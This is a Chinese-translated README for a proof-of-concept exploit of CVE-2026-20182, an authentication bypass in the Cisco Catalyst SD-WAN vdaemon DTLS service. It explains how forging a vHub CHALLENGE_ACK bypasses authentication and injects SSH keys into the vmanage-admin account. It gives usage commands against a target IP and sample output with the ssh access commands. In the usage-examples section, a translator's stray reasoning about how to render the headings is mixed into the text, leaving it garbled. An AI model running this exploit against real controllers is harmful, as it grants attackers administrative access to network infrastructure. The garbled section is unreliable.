portbuster1337/CVE-2026-20182

# CVE-2026-20182 — Cisco Catalyst SD-WAN Controller / Manager 身份验证绕过 针对 **CVE-2026-20182** 的概念验证利用代码，该漏洞为 Cisco Catalyst SD-WAN Controller (vSmart) 和 Manager (vManage) 上 vdaemon DTLS 服务（UDP/12346）中的一个严重（CVSS 10.0）身份验证绕过漏洞。 **披露日期：** 2026 年 5 月 14 日，由 Rapid7 (Stephen Fewer & Jonah Burgess) 披露 **CISA KEV：** 于 2026 年 5 月 14 日添加（紧急指令 26-03） **CVSS：** 10.0 — CWE-287：身份验证不当 ## 漏洞详情 vdaemon 服务使用多阶段 DTLS 握手来验证控制平面对等体。`vbond_proc_challenge_ack()` 函数实现了针对设备类型的证书验证——但设备类型 2（vHub）**没有验证代码路径**。发送一个 `device_type=2` 的 CHALLENGE_ACK 会导致该函数跳过所有条件判断，并无条件地将 `peer->authenticated` 设置为 1。 无需有效凭据、无需 CA 签名证书、也无需了解 SD-WAN 部署情况。 ## 利用代码功能 1. 与目标的 vdaemon 服务（UDP/12346）建立 DTLS 1.2 连接 2. 接收 CHALLENGE 消息（msg_type=8） 3. 发送声称自己是 **vHub**（device_type=2）的 CHALLENGE_ACK → 对等体被标记为已验证 4. 发送 HELLO（msg_type=5）→ 对等体转为 UP 状态 5. 通过 `MSG_VMANAGE_TO_PEER`（msg_type=14）将 SSH 公钥注入到 `/home/vmanage-admin/.ssh/authorized_keys` 6. 以 `vmanage-admin` 身份授予 NETCONF 访问权限（SSH TCP/830）或 SSH 访问权限（TCP/22） ## 使用方法 ``` python3 cve-2026-20182.py -t [options] ``` ### 选项 | 参数 | 说明 | |----------|-------------| | `-t`, `--target` | 目标 IP 或主机名 | | `--port` | vdaemon UDP 端口（默认：12346） | | `--key-file` | 要注入的现有 SSH 公钥路径（可选） | | `--netconf` | 通过 SSH 连接到 NETCONF 来验证利用是否成功 | ### 示例 ``` # ity, so it might be jargon. I'll keep it as "exploit". So first translation: "生成一个新的 key pair 和 exploit" but that implies both are nouns. Actually "generate" is verb, "fresh key pair" is noun phrase, "exploit" is noun. So it could be "Generate a fresh key pair and (a) exploit" meaning generate both. That makes sense: generate a key pair and an exploit. So I'll treat "exploit" as a noun and keep it. Thus: "生成一个新的 key pair 和 exploit". But the example didn't keep "exploit" as English? Not sure. Let's look at the example: "Running Naabu" -> "运行 Naabu". "Naabu" is a tool name, kept. "key pair" is not a tool name, but a general term. However, many translations keep "key pair" as "密钥对". But the instruction explicitly says "keep all professional terms... in their original English form". So I'll keep "key pair". And "exploit" as jargon, keep as "exploit". So first heading: "生成一个新的 key pair 和 exploit" python3 cve-2026-20182.py -t 192.168.1.100 # Second heading: "Use an existing public key" - "Use" is verb, translate to "使用". "an existing" -> "一个现有的". "public key" is a professional term, keep as "public key". So "使用一个现有的 public key". But "public key" could be translated as "公钥", but we keep English. So "使用一个现有的 public key". python3 cve-2026-20182.py -t 192.168.1.100 --key-file ~/.ssh/id_rsa.pub # Third heading: "Exploit and verify via NETCONF" - "Exploit" again, assume noun? Or verb? "verify" is verb. If "Exploit" is noun, then it's "Exploit and verify" meaning the exploit and the verification? That seems odd. More likely "Exploit and verify" as two verbs: "利用并验证". But then "via NETCONF" -> "通过 NETCONF". NETCONF is a protocol name, keep as "NETCONF". So if verbs: "利用并验证通过 NETCONF" but that is awkward. Better: "通过 NETCONF 利用并验证" but order changed. Original order: "Exploit and verify via NETCONF" -> "通过 NETCONF 进行 Exploit 和验证" if "Exploit" is noun. Or "通过 NETCONF 利用并验证" if verb. Since we kept "exploit" as noun in first, consistency suggests keep "exploit" as noun in third. But then "verify" is verb, so "Exploit and verify" would be "Exploit 和验证" where "Exploit" is noun. That is plausible: "Exploit and verify via NETCONF" means the exploit and the verification are done via NETCONF. So translate as "通过 NETCONF 的 Exploit 和验证". But the original is not possessive. Simpler: "Exploit 和验证通过 NETCONF" but word order. I'll go with "通过 NETCONF 的 Exploit 和验证" or "通过 NETCONF 进行 Exploit 和验证". Let's decide. python3 cve-2026-20182.py -t 192.168.1.100 --netconf ``` ### 输出 ``` [*] Targeting 192.168.1.100:12346 (vdaemon DTLS) [+] DTLS handshake complete (received msg_type=8, 1027 bytes) [*] Sending CHALLENGE_ACK with device_type=2 (vHub) ... [+] peer->authenticated = 1 (authentication bypassed!) [*] Sending HELLO ... [+] Peer is UP state (peering handshake bypass successful) [*] Injecting SSH public key ... [+] NETCONF: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa -p 830 vmanage-admin@192.168.1.100 [+] SSH: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa vmanage-admin@192.168.1.100 ``` ## 受影响版本 | 版本 | 修复版本 | |---------|---------------| | < 20.9 | 迁移到受支持的版本 | | 20.9 | 20.9.9.1 | | 20.10 | 20.12.7.1 | | 20.11 | 20.12.7.1 | | 20.12 | 20.12.5.4 / 20.12.6.2 / 20.12.7.1 | | 20.13 | 20.15.5.2 | | 20.14 | 20.15.5.2 | | 20.15 | 20.15.4.4 / 20.15.5.2 | | 20.16 | 20.18.2.2 | | 20.18 | 20.18.2.2 | | 26.1.1 | 26.1.1.1 | ## 研究参考 - **Rapid7（原始披露）：** [CVE-2026-20182：Cisco Catalyst SD-WAN Controller 中的严重身份验证绕过](https://www.rapid7.com/blog/post/ve-cve-2026-20182-critical-authentication-bypass-cisco-catalyst-sd-wan-controller-fixed/) — Stephen Fewer 与 Jonah Burgess 提供的完整技术分析、反编译代码及协议细节 - **Cisco 安全公告：** [cisco-sa-sdwan-rpa2-v69WY2SW](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa2-v69WY2SW) — 包含修复版本的安全公告 - **CISA KEV：** [CVE-2026-20182](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) — 紧急指令 26-03（2026 年 5 月 17 日前修复） - **NVD：** [CVE-2026-20182](https://nvd.nist.gov/vuln/detail/CVE-2026-20182) — 国家漏洞数据库条目 - **Rapid7 Metasploit 模块：** `cisco_sdwan_vhub_auth_bypass` — Metasploit 框架中的辅助模块 - **BleepingComputer：** [Cisco 警告新关键 SD-WAN 漏洞在零日攻击中被利用](https://www.bleepingcomputer.com/news/security/cisco-warns-of-new-critical-sd-wan-flaw-exploited-in-zero-day-attacks/) - **Tenable：** [关于 Cisco SD-WAN 漏洞持续被利用的常见问题](https://www.tenable.com/blog/faq-about-the-continued-exploitation-of-cisco-catalyst-sd-wan-vulnerabilities-uat-8616) - **Cisco Talos：** 威胁行为者 UAT-8616 被确认在野外利用此漏洞 ## 技术细节 vdaemon 协议头部为 12 字节： | 偏移 | 大小 | 字段 | 说明 | |--------|------|-------|-------| | 0 | 1 | msg_type | 低四位 = 类型，高四位 = 版本 | | 1 | 1 | device_info | 高四位 = 设备类型，低四位 = 标志 | | 2 | 1 | flags | 标准值 0xA0 | | 3 | 1 | padding | 始终为 0x00 | | 4-7 | 4 | domain_id | 大端 uint32 | | 8-11 | 4 | site_id | 大端 uint32 | 设备类型：1=vEdge，2=vHub，3=vSmart，4=vBond，5=vManage ## 环境要求 - Python 3.7+ - `openssl` CLI（用于 DTLS 传输） - `cryptography` 库（`pip install cryptography`） ## 免责声明 此利用代码仅供获得明确书面授权的红队行动、渗透测试和安全研究使用。未经授权的使用是非法的。

标签：CISA KEV, CISA项目, Cisco, CVE-2026-20182, CVSS 10.0, DTLS, NETCONF, PoC, Python渗透工具, Rapid7, SD-WAN, SSH公钥注入, UDP 12346, vdaemon, vHub, vManage, vSmart, 关键漏洞, 内存分配, 安全测试工具, 应急指令, 暴力破解, 系统遥测, 编程工具, 网络设备安全, 认证绕过, 设备类型绕过, 身份认证缺陷, 远程代码执行, 逆向工具